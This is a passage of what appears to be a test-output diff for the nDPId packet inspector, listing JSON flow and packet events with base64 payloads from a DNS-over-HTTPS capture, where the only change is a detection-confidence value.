WlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnM
dtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1Sb
NYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"} 
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs
5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82
sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6
